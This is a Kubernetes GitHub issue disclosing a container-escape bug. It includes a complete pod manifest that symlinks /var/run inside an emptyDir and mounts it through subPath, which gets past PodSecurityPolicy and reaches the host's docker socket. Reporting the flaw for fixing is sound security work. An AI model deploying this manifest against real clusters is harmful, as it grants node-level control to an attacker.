### ISSUE TITLE
PodSecurityPolicy can be sidestepped with innocent emptyDir and subpath

### ISSUE THREAD

**Issue by redbaron** [kubernetes/kubernetes#56625]
Here is a pod which would be allowed by fairly strict security policies, yet gives full control over node host by gaining access to docker socket:

```
apiVersion: v1
kind: Pod
metadata:
  name: secbypass
spec:
  initContainers:
  - name: prep-symlink
    image: "docker:stable"
    command: ['ln', '-s', '/var/run', '/tmp/host-var-run']
    volumeMounts:
    - name: docker-socket
      mountPath: /tmp/
  containers:
  - name: all-your-base-are-belong-to-us
    image: "docker:stable"
    command: ["/bin/sh", "-ec", "docker ps; /bin/sleep 999999"]
    volumeMounts:
    - name: docker-socket
      subPath: host-var-run
      mountPath: /var/run
  volumes:
  - name: docker-socket
    emptyDir: {}
```

/kind bug
/sig node
